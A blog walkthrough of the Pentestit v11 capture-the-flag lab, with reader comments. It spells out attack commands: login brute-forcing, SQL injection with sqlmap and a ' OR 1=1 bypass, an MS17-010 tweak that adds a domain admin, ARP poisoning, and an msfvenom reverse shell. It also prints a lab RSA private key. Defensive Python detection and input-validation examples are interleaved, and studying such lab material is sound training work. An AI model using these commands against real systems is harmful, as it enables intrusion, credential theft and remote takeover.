Hey all,
Lately, I've been dedicating my spare time to Pentestit v11, a terrific pentest lab which is great for honing those skills. If you have the spare time, I highly recommend participating – lab.pentestit.ru.
Version 11 is named “Who is Mr. Hacker?”. To start, we are given a network diagram and two target IP addresses: 192.168.101.10 and 192.168.101.11. For this post, I’ve created my own network diagram so I can mark it up along the way.
Obviously there are spoilers ahead.
The Target
External Enumeration
With the initial lab VPN connection established, we begin by scanning the two given IP addresses.
192.168.101.10 TCP/80 is a WordPress blog site that doesn't have much in the way of attack surface. Scanning this site will quickly reveal that there is a web application firewall (WAF) between us and the site. Note: when scanning, use a different user-agent or your requests will be filtered.
So not too much, but let's keep the kittycatfish plugin in mind because we'll end up using it later.
192.168.101.10 TCP/8080 is a Roundcube webmail login page, but without a valid email address it doesn't offer much in the way of attack surface.
192.168.101.10 TCP/25 is an SMTP server with VRFY and EXPN disabled. Additionally, an error is returned when trying to enumerate users via RCPT TO, so there is not much there.
192.168.101.11 TCP/2222 is an SSH server using key-pair authentication.
192.168.101.10 TCP/88 is a Vtiger v6.3.0 CRM site with a login page which looks promising.
CRM
The application version is printed right on the login page in the clear, very kind of vtiger. For this version there is an authenticated RCE vulnerability, but we'll first need valid credentials before we can reach it. The vtiger wiki lists the default credentials as admin/admin, but unfortunately the password has been changed. At this point let's use patator to start a brute-force attack. There is an anti cross-site request forgery (CSRF) token; however, to be honest, I'm not sure whether it is enforced during login, as there are no error messages when an incorrect token is submitted. Either way, it's not a bad idea to GET and POST the correct anti-CSRF token (__vtrftk), just in case.
Using gotmilk's blog post as a reference, I put together this patator startup script.
#!/bin/bash
# Fetch the login page once: -D saves the response headers (for the PHPSESSID cookie), -A sets a browser user-agent.
bulk=$(curl -sD headers.txt -A "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" "http://192.168.101.10:88/index.php")
echo ${bulk}
# Pull the anti-CSRF token out of the page and the session id out of the saved headers. Both are echoed as a sanity
# check; the token actually used during the attack is re-extracted per request by patator's before_egrep below.
CSRF=$(echo ${bulk} |grep "sid:" | cut -d ":" -f3 | cut -d ";" -f1)
SESSID=$(cat headers.txt | grep PHPSESSID | cut -d " " -f2 | cut -d ";" -f1)
echo ${CSRF}
echo ${SESSID}
# Before each login POST, patator GETs index.php with the same session cookie, captures csrfMagicToken into _CSRF_,
# substitutes it into the body, and ignores responses containing the failure string.
python /root/tools/patator/patator.py http_fuzz \
  url="http://192.168.101.10:88/index.php?module=Users&action=Login" \
  method=POST \
  body="__vtrftk=sid:_CSRF_&username=admin&password=FILE0" \
  0=rockyou.txt \
  follow=1 accept_cookie=0 \
  header="Cookie: ${SESSID}" \
  before_urls="http://192.168.101.10:88/index.php" \
  before_header="Cookie: ${SESSID}" \
  before_egrep='_CSRF_:var csrfMagicToken = "(\S+)"' \
  -x ignore:egrep="Invalid username or password"
As seen above, the wordlist rockyou.txt was used; it's pretty beefy and will take a while. I recommend brute-forcing overnight and maybe starting a second brute-force task in tandem using a reversed rockyou wordlist. Either that, or just look below.
Also, it's not a bad idea to do a demo run through Burp Suite just to make sure the requests and responses are as expected. With patator (v0.7), add the following:
proxy=http://127.0.0.1:8080 proxy_type=http
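From the other side of the fence, the login hammering above is easy to spot in the web server's access log. The following is an added example, not part of the original post and not vtiger's code: it parses constructed combined-format log lines (the traffic is made up) and flags any source IP that POSTs to the vtiger login endpoint ten or more times within a minute. The log format, the threshold and the window are assumptions; adjust them to the site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format: client ip, timestamp, request line, status, bytes, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# The vtiger login endpoint from the walkthrough above.
LOGIN_PATH = "/index.php?module=Users&action=Login"


def _line(ip, sec, method, path, ua="Mozilla/5.0"):
    """Build one constructed combined-log line (sample data, not real lab traffic)."""
    return (f'{ip} - - [12/Nov/2017:22:01:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 5123 "-" "{ua}"')


# Constructed sample log: one client hits the login form 12 times in 12 seconds (a failed vtiger
# login still answers 200 once the redirect is followed, so the status code alone does not separate
# failures from successes), and one client browses normally.
SAMPLE_LINES = (
    [_line("10.0.0.5", s, "POST", LOGIN_PATH, ua="Mozilla/5.0 (X11; Linux x86_64; rv:45.0)")
     for s in range(1, 13)]
    + [_line("10.0.0.9", 5, "GET", "/index.php"),
       _line("10.0.0.9", 9, "POST", LOGIN_PATH),
       _line("10.0.0.9", 40, "POST", LOGIN_PATH)]
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_login_bruteforce(lines, login_path=LOGIN_PATH, threshold=10, window=timedelta(seconds=60)):
    """Map source ip -> peak number of login POSTs seen inside any `window`, for ips reaching `threshold`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        attempts[rec["ip"]].append(rec["ts"])

    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over the sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), count)
    return alerts


if __name__ == "__main__":
    for ip, peak in find_login_bruteforce(SAMPLE_LINES).items():
        print(f"possible login brute force from {ip}: {peak} POSTs to {LOGIN_PATH} within 60s")
```

Counting POSTs rather than error responses is deliberate: with follow=1 the failed attempts above come back as 200, so a rule keyed on 401/403 would see nothing. Pair this with rate limiting or lockout on the login endpoint itself, since the user-agent check that fronts this site is trivially sidestepped.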
With valid credentials, we are able to access that authenticated RCE vulnerability. To navigate to the vulnerable page, start by selecting the gear in the top right corner -> CRM Settings -> Templates -> Company Details -> Edit -> Browse -> Save. Attempting to upload a PHP shell gets rejected, so instead upload an image and send the legitimate web transaction to the Repeater module in Burp Suite. With Repeater, we can submit multiple requests without the hassle of resubmitting and constantly intercepting. Below is an example of a simple PHP command shell upload.
If everything worked, the webshell should have been uploaded to the /test/logo directory. Note: if the word "php" appears anywhere in your shell, the page will throw an error. So if you're looking to upload a webshell with a few more features, like B374K, use a base64-encoded version … just remember to remove "php" at the top.
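The upload check described above is a content blocklist (reject anything containing "php"), and the base64 trick works precisely because the check looks at the wrong thing. As an added example, not vtiger's code and not from the original post, here is that weak check next to an allowlist check of the kind a logo upload should use: accept only a known image extension, require the matching file signature, and let the server pick the stored name. The signatures and sample bodies are constructed.

```python
import base64
import os
import secrets

# Constructed sample upload bodies (not files from the lab).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16               # minimal PNG signature
PHP_BYTES = b"<?php echo 'x'; ?>"                             # script body in the clear
ENCODED_PHP_BYTES = base64.b64encode(b"<?php echo 'x'; ?>")   # same body, base64-encoded


def weak_upload_check(filename, data):
    """Content blocklist of the kind described above: reject only bodies that contain 'php'.
    It never looks at what the file actually is, so any encoding of the body passes."""
    return b"php" not in data.lower()


# File signatures for the image types a logo upload should accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Extensions allowed for each detected type.
ALLOWED = {"png": {"png"}, "jpg": {"jpg", "jpeg"}, "gif": {"gif"}}


def sniff_image_type(data):
    """Return 'png', 'jpg' or 'gif' from the file signature, or None if the bytes are not an image."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def strict_upload_check(filename, data):
    """Allowlist check: a known image extension, an image signature, and the two must agree."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    kind = sniff_image_type(data)
    return kind is not None and ext in ALLOWED[kind]


def storage_name(data):
    """Server-chosen file name: random stem plus an extension derived from content, never from the client."""
    kind = sniff_image_type(data)
    if kind is None:
        raise ValueError("not an image")
    return secrets.token_hex(16) + "." + kind


if __name__ == "__main__":
    for label, body in [("png", PNG_BYTES), ("php", PHP_BYTES), ("base64 php", ENCODED_PHP_BYTES)]:
        print(f"{label:>10}: weak={weak_upload_check('logo.png', body)} "
              f"strict={strict_upload_check('logo.png', body)}")
```

Even with the strict check, store uploads outside the web root or under a path the web server will never execute; the check keeps script bodies out, the storage location keeps a mistake from becoming code execution.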
Exploring the filesystem will quickly reveal the CRM token, named rce_token.txt.
Within the CRM admin page, looking at Darthvader's user preferences we see some key information that can aid other attacks. To see this information, start in the upper right corner and select Preferences from the drop-down menu named darthvader.
Great, we have an email address, which might open up an avenue on the Roundcube webmail page. While Vader is the man when it comes to overthrowing the oppression of the Jedi, fortunately for us he sucks at passwords. On Roundcube, username: admin@test.lab and password: darthvader.
Copy the private key from the email and SSH into the second office at 192.168.101.11, as per the network diagram.
ssh tech@192.168.101.11 -p 2222 -i ssh-office2-priv.key
As expected, we now have access to subnet 192.168.13.0/24, the second office. In the directory /etc/openvpn there is an OpenVPN configuration file for connecting to TCP/1194 on 192.168.101.10.
We do not have permission to read /opt/openvpn/auth.txt; however, it does appear that the authentication username is Office-2. We will need this file later on, but for now let's shift focus back to 192.168.13.0/24. Scanning each of the endpoints reveals that RDP (TCP/3389) is the only open port.
RDP
With nothing beyond RDP access to the endpoints in the 192.168.13.0/24 subnet, we're probably looking at a brute-force attack again. Using proxychains, enumerate the RDP users on each of the potential targets.
ssh tech@192.168.101.11 -D 9000 -p 2222 -i ssh-office2-priv.key
proxychains xfreerdp /sec:tls /u:"" /v:192.168.13.1
- 192.168.13.1
  - arm554
  - user
- 192.168.13.2
  - arm550
  - user
- 192.168.13.3
  - arm672
  - user
Naturally, you might think that the user account, and maybe even the arm accounts, share the same password; not the case. Take my word for it and brute-force arm554 on 192.168.13.1.
ssh -L 3389:192.168.13.1:3389 -p 2222 -i ssh-office2-priv.key tech@192.168.101.11
crowbar -u arm554 -s 127.0.0.1/32 -l log.txt -o out.txt -b rdp -C /usr/share/john/password.lst
RDP into 192.168.13.1 with arm554 and redirect /tmp to transfer files.
proxychains xfreerdp /v:192.168.13.1 /sec:tls /u:arm554 /p:tiger /drive:test,/tmp/
Arm554 is an under-privileged user account on a vanilla Windows 7 machine without any patches installed. There are plenty of options; I used a PowerShell MS16-032 exploit, eliminating the need to compile. After escalating privileges, we find the token on the user's desktop.
Additionally, there is a directory called "Old test.lab users" which has a collection of files containing details about various users, including an NT hash. This will work into one of the following challenges, but I'm not going to lie, I missed it the first time around.
There isn't anything else to grab from 192.168.13.0/24, so let's step back and focus on the server.conf OpenVPN configuration file obtained from 192.168.101.11. Modify server.conf to brute-force the OpenVPN server on 192.168.101.10 by removing the pointer to the auth-user-pass authentication file. Additionally, copy the certificate to a separate file, openvpn.crt.
And using crowbar we spin up the brute-force attack.
crowbar -s 192.168.101.10/32 -b openvpn --config /root/CTFs/Pentestit/v11/server.conf --username Office-2 -k /root/CTFs/Pentestit/v11/openvpn.crt -C /usr/share/john/password.lst
Stepping out, here is where we are at.
By establishing a VPN connection to 192.168.101.10, we are able to bypass the WAF protecting SITE (172.16.0.11).
SITE
Recall the WordPress Kittycatfish vulnerability that was enumerated with wpscan during external enumeration.
http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0
While poking around the vulnerable page, I noticed that the left CSS property disappears when the injected condition is false. For example, with kc_ad=16 the page contains "left: 50%;"; however, with kc_ad=32, or with kc_ad=16 AND 1=2, the page instead contains ": px;".
Knowing this, we are able to enumerate with sqlmap using the --string switch. The --string switch evaluates the server response for the given value; if the value is present in the response, the injected query is considered to have evaluated to true.
sqlmap --random-agent -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;"
Using sqlmap, walking through the databases and tables is pretty straightforward; if you need help, jump over to the usage guide. The SITE token is in the database and can be enumerated using the sqlmap line below.
sqlmap --random-agent -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0" --dbms=mysql --level=5 --risk=3 -v 3 --threads 10 --string="left: 50%;" -D testlabdb -T tl_token --dump
CUPS
Browsing to http://172.16.0.14 presents two options: admin panel and local storage. Local storage brings us to a login prompt which is vulnerable to SQL injection. If it's a bit difficult to read: username: a' OR 1=1;-- / password: whatever
Bypassing the login page brings us to a scan page with quite a few images along with their filenames. One image filename is entirely different from all the others; plugging the string into a hex-to-ASCII converter gives us the CUPS token.
Additionally, there is an image of an RSA private key; obviously we'll need that later.
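To show why the --string oracle works against the Kittycatfish page and why the CUPS login falls to a' OR 1=1;--, here is an added example, my own code and not the plugin's or the lab's, using an in-memory SQLite database as a stand-in for MySQL. Each query appears twice: with the parameter spliced into the SQL text, which is the vulnerable pattern, and with the value bound as a parameter, which is the fix. Table and column names are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema standing in for the plugin's ad table and the CUPS login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER, left_pos TEXT)")
    conn.execute("INSERT INTO ads VALUES (16, '50%')")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'constructed-secret')")
    return conn


def _css(row):
    """Mirror what the page rendered: the property when a row came back, ': px;' otherwise."""
    return f"left: {row[0]};" if row else ": px;"


def ad_css_vulnerable(conn, kc_ad):
    """kc_ad is spliced into the SQL text, so 'AND 1=2' rewrites the WHERE clause and the response."""
    row = conn.execute(f"SELECT left_pos FROM ads WHERE id = {kc_ad}").fetchone()
    return _css(row)


def ad_css_safe(conn, kc_ad):
    """kc_ad is validated as an integer and bound as a parameter; injected SQL never reaches the parser."""
    try:
        ad_id = int(kc_ad)
    except (TypeError, ValueError):
        return _css(None)
    row = conn.execute("SELECT left_pos FROM ads WHERE id = ?", (ad_id,)).fetchone()
    return _css(row)


def oracle_leaks(conn, render):
    """True when a true and a false injected condition render differently, i.e. when a
    '--string' style comparison hands an attacker one bit of the database per request."""
    return render(conn, "16 AND 1=1") != render(conn, "16 AND 1=2")


def login_vulnerable(conn, username, password):
    """String-built login query: the quote in the username ends the literal early and the
    comment marker swallows the password check."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised login query: the whole username, quotes and all, is compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle leaks:", oracle_leaks(db, ad_css_vulnerable))
    print("safe oracle leaks:     ", oracle_leaks(db, ad_css_safe))
    print("vulnerable login bypass:", login_vulnerable(db, "a' OR 1=1;--", "whatever"))
    print("safe login bypass:      ", login_safe(db, "a' OR 1=1;--", "whatever"))
```

The safe variants give the same response for every malformed value, which is exactly what takes the oracle away from sqlmap: with no true/false difference to match on, --string has nothing to work with.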
AD
Enumerating with nmap, we find that 172.16.0.10 is a domain controller for the test.lab domain (the name, duh). Using the Metasploit module auxiliary/gather/kerberos_enumusers we are able to enumerate accounts on the domain.
As seen above, account arm554 is present in the test.lab domain. Using the NT hash we acquired from the RDP target, pass the hash to gain access to the files share. Token.txt is the AD token and network_test.txt has credentials for the next challenge. The contents of network_test.txt are as follows:
Hi, mate! Need to test ARP-table in DIR subnet. I'll install intercepter admin:77_GrantedSuperAdmin_77
To be honest, the first time through I did not grab the AD token by passing the hash. Instead, I used MS17-010 to gain access, with a few modifications.
def smb_pwn(conn):
    smbConn = conn.get_smbconnection()
    service_exec(conn, r'cmd /c net user cplsec P@ssw0rd123! /add && net group "domain admins" cplsec /add /domain')
However, don't fling exploit code where it's not needed; use pth.
Recall that we acquired an image of an SSH private key for 172.16.0.252. After unsuccessfully playing around with various OCR solutions, I manually typed out the private key; it was not fun … you're welcome.
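On the defensive side, the Kerberos user enumeration used above leaves a distinctive trail on the domain controller: every guessed name that does not exist produces Security event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from the same client address. The detection below is an added example, not from the original post and not part of Metasploit; the events are constructed records in the shape of 4768's data fields, and the threshold and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_TGT_REQUEST = 4768            # "A Kerberos authentication ticket (TGT) was requested"
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # result code logged when the requested principal does not exist


def _ev(ts, user, ip, status):
    """One constructed 4768 record keyed like the event's XML data fields (sample data, not a real log)."""
    return {"TimeCreated": ts, "EventID": EVENT_TGT_REQUEST, "TargetUserName": user,
            "IpAddress": ip, "Status": status}


SAMPLE_EVENTS = [
    _ev("2017-11-12T23:00:00", "arm554", "::ffff:172.16.0.11", "0x0"),        # valid name, normal request
    _ev("2017-11-12T23:00:01", "administrator", "::ffff:172.16.0.11", "0x0"),
] + [
    # eight guesses in eight seconds from one client, none of them real accounts
    _ev(f"2017-11-12T23:00:{2 + i:02d}", name, "::ffff:172.16.0.11", "0x6")
    for i, name in enumerate(["aaron", "adam", "alan", "albert", "alex", "alice", "amy", "andrew"])
] + [
    _ev("2017-11-12T23:05:00", "jsmith", "::ffff:172.16.0.22", "0x0"),
    _ev("2017-11-12T23:05:30", "jsmth", "::ffff:172.16.0.22", "0x6"),         # a single typo, not enumeration
]


def source_ip(event):
    """4768 records IPv4 clients as IPv4-mapped IPv6 ('::ffff:a.b.c.d'); strip the prefix."""
    ip = event["IpAddress"]
    return ip[7:] if ip.startswith("::ffff:") else ip


def detect_kerberos_user_enum(events, threshold=5, window=timedelta(minutes=5)):
    """Map source ip -> peak count of distinct unknown principals requested inside `window`.

    Only ips reaching `threshold` distinct unknown names are returned. Requests for names that do
    exist complete normally and are not counted, so this catches the guessing, not the hits."""
    unknown = defaultdict(list)
    for e in events:
        if e["EventID"] != EVENT_TGT_REQUEST or int(e["Status"], 16) != KDC_ERR_C_PRINCIPAL_UNKNOWN:
            continue
        unknown[source_ip(e)].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"].lower()))

    alerts = {}
    for ip, items in unknown.items():
        items.sort()
        start = 0
        for end in range(len(items)):          # sliding window over the sorted events
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = len({name for _, name in items[start:end + 1]})
            if distinct >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), distinct)
    return alerts


if __name__ == "__main__":
    for ip, names in detect_kerberos_user_enum(SAMPLE_EVENTS).items():
        print(f"possible Kerberos user enumeration from {ip}: {names} distinct unknown principals")
```

Counting distinct names rather than raw events keeps a user who mistypes their own account several times from tripping the rule, while a wordlist run produces a new unknown name on every request. Auditing of "Kerberos Authentication Service" must be enabled for 4768 to be written at all.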
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4CxmKK2/kvV0+srp24bVZm+yYvCz+rvgHHxX1w7F0oD8aUDI
won79K9XpntFDPUvtJRMg9WqK/zKUwLsMQLGWT66PT4GVbQw4Nr56rOrBIuag/qg
o9WcX0AfIyFYFCNz0TnLfRXSDcSQY0CRK8WfKx5c8uP2kudtzAGv5GQCpSjM2uNV
shOu7xmgo/AMUQvPi8kvD/gAme9G8WkTgpVpAwlsthjxQ9fEO6abHHkjbGGec0O8
4T7Bo2nU8bHjr6Jd+dzUAvytblG1yNvGIybAFAsVqUHjbt9wGZgFKr1kA+3ZCbyF
qFZZ37dpZr2grZXwzlCtPUJGuMfCq7N0ZhmcAwIDAQABAoIBAQDCXPx+TJcLXhJ8
164HjlI8LKAoNLZ3sKlRSWYHqmFOcFNpFqh6M5Tmw5hlWf+2imdAVEw7Cegvl0/8
xU3v+I3tFvv22W44pLC0ZGfHXNvsZvYjdAwPwMeBtmDI3sI1Q7/JKikKXP7wvPrL
c1Hq979XbU39sjU5jbqe5N+SUDwS4Tu79L0uXehnqvCSlyIU9joDhvW87DeaLRaQ
wwkKR9gnPtiKebZ73VGParJ42CZlRgfEOvoLWUk+YrhRfZ9r4uva0IHbZ1LhqNcL
k0OlKEDUDzuju0/YwgBSZVSrhkCAnCnipsxQMc4g2aytPOTdKz4BtF+cZV/rXhyM
kSPIeh1xAoGBAPJfcCQWqsq/dwwOC9I9jWj4W9xAFPbaPSq1oGwNr0ugZ/4DZLGe
glGte8iG/Tc1Lb1Ege2dYPRR5OeFhyo8tADPKleFvDBYGN2asf4JirljxrW5F+ON
q5paXqjbaBKk/Z6f08UlwxjSHRHOWqEvYZkm5bAxrufNKBVpwVWHU6eNAoGBAOzH
AryHBdo45qLnzJR87zDftNNrua1VmhWu+h+I7zj4hr52gM/TheHL/ODJZCyZU3vt
7ncDjUM91xwh63vkCiByEYk4vTGnmaj9brmndracJ7jwwSUn/YqPj0D3yD0lrpxd
PLn0c1ic5jaoTSWZN748PoPnP+CPvhjQYvxX5OXPAoGALmnEScTlc+nyXCaccOhE
miNlQ+opmZP1PqaFT+vW876F64iu0ayu/AEiwSXIe7f9SE9EKkKG/IJqOUPCvH3f
YoBJdXUwsnlMWbNz/lfJbvMCbG5Detn4UJiZo/BQH7Hkt2mX3hr7H1etJWnExTUT
lYZzWahJ/C23TVJxKXW+uUkCgYEAnLDOhMit/M3vAxt27UUIXUWNuuPtSmH9yB+1
cq0B8qe1M9HkSKRoUxbVUES2QDVvY/H+/0+gakFAW2OvHJu6f+I87JxZx8RsEcM1
RTMngo0wVFku2FHwnYOHf6z6HE0VknC5QS4eLyQVzVHvS9RraT8g99VPFmLJoE43
U1svJU0CgYAecYtH3ZvIwPA85sTuTkKAGMmvRxzPnQkyiUF9BwN+B1mfL4uZyJVy
VVWhCwXf/h9G3fKzuV0m0Dz6O7r5DqRqs0uCNbxPaS8qWPcRckwV2Y9htMjXLyXU
nOV4UZBbQSXb/AoSFdcCBjonbudkiAxzm0STdiQ92kZNavvfZAjXQw==
-----END RSA PRIVATE KEY-----
Spin up a SOCKS proxy and connect to 192.168.12.2 using the credentials we acquired from AD.
ssh -D 9000 -i CTFs/Pentestit/v11/manualkey.txt morgan@172.16.0.252
proxychains xfreerdp /u:admin /p:77_GrantedSuperAdmin_77 /v:192.168.12.2 /drive:test,/tmp/
In c:\soft there is a collection of files including Intercepter-NG and netcat for Windows. Smart-scan the network, assign 192.168.12.1 as a target, and set 192.168.12.3 as the gateway.
Use a pcap filter in RAW mode to show traffic from 192.168.12.1 and 192.168.12.3 only.
host 192.168.12.1 or 192.168.12.3
Start the sniffer, NAT, and ARP poisoning in the MITM mode section. If everything was configured correctly we should see an HTTP request intercepted from 192.168.12.1 destined for 192.168.12.3.
As seen above, 192.168.12.1 is requesting quake3.exe. Using msfvenom, generate a stageless reverse TCP shell for Windows.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.12.2 LPORT=443 -f exe > quake3.exe
Copy quake3.exe over to 192.168.12.2 and, using Intercepter's injection rules, create a rule to inject our reverse shell exe when 192.168.12.1 comes knocking.
Restart the ARP poisoning attack and start listening on port 443 with netcat (run as administrator while opening the port in the host firewall). Eventually, a reverse shell should spawn from 192.168.12.1. The token, along with an SSH key for 192.168.11.1, can be found in the c:\users\director\documents directory.
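The note in network_test.txt asks for exactly the kind of ARP-table check that would have caught what just happened on 192.168.12.0/24: the gateway's IP suddenly answering from a different MAC, and one MAC claiming several IPs. The following is an added example, not from the original post and not part of Intercepter-NG; it walks a list of constructed ARP replies (the addresses and MACs are made up, only the IP roles follow the scenario above) and reports both conditions.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.12.3"   # gateway role from the scenario above

# Constructed ARP "is-at" replies as a sniffer would hand them over (sample data, not a capture).
SAMPLE_ARP_REPLIES = [
    {"ts": 1.0, "ip": "192.168.12.3", "mac": "00:50:56:aa:00:03"},   # gateway, legitimate
    {"ts": 1.5, "ip": "192.168.12.1", "mac": "00:50:56:aa:00:01"},   # workstation, legitimate
    {"ts": 2.0, "ip": "192.168.12.2", "mac": "00:50:56:aa:00:02"},   # third host, its own address
    {"ts": 3.0, "ip": "192.168.12.3", "mac": "00:50:56:aa:00:02"},   # gateway IP now claimed by .2's MAC
    {"ts": 3.1, "ip": "192.168.12.1", "mac": "00:50:56:aa:00:02"},   # workstation IP also claimed by .2's MAC
]


def detect_arp_spoofing(replies, gateway_ip=GATEWAY_IP):
    """Replay ARP replies in order and return a list of alerts.

    Two conditions are reported: an IP whose MAC changes from what was seen before (flagged
    separately when it is the gateway), and a MAC that has answered for more than one IP."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for r in replies:
        ip, mac = r["ip"], r["mac"].lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"ts": r["ts"],
                           "type": "gateway-mac-changed" if ip == gateway_ip else "ip-mac-changed",
                           "ip": ip, "old": prev, "new": mac})
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append({"ts": r["ts"], "type": "mac-claims-multiple-ips",
                           "mac": mac, "ips": sorted(mac_to_ips[mac])})
    return alerts


def suspect_macs(alerts):
    """MACs that appear as the new claimant in any alert: the hosts worth pulling off the segment."""
    return sorted({a.get("new") or a.get("mac") for a in alerts})


if __name__ == "__main__":
    found = detect_arp_spoofing(SAMPLE_ARP_REPLIES)
    for a in found:
        print(a)
    print("suspect MACs:", suspect_macs(found))
```

A workstation and its gateway both resolving to the same third MAC is the signature of a full-duplex poison, which is what Intercepter's NAT mode sets up. Static ARP entries on the hosts, or Dynamic ARP Inspection on the switch, stop the poison from taking; this check is what you run where neither is in place.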
Once again, stepping out, here is where we are at.
I'm stuck at reading rce_token.txt; it can be accessed by root, but we use www-data, so what did you do to read that?
IIRC I didn’t have to escalate to root. Was this just someone changing the challenge? Were you able to read the file?
Hi, how did you download/copy the key to your local machine?
Man, I didn't, that's hand-copied :S
To be more precise, how did you get the key from the Director’s box?